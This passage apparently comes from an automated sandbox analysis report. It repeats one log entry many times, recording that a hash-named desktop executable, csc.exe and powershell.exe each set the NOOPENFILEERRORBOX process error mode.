                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
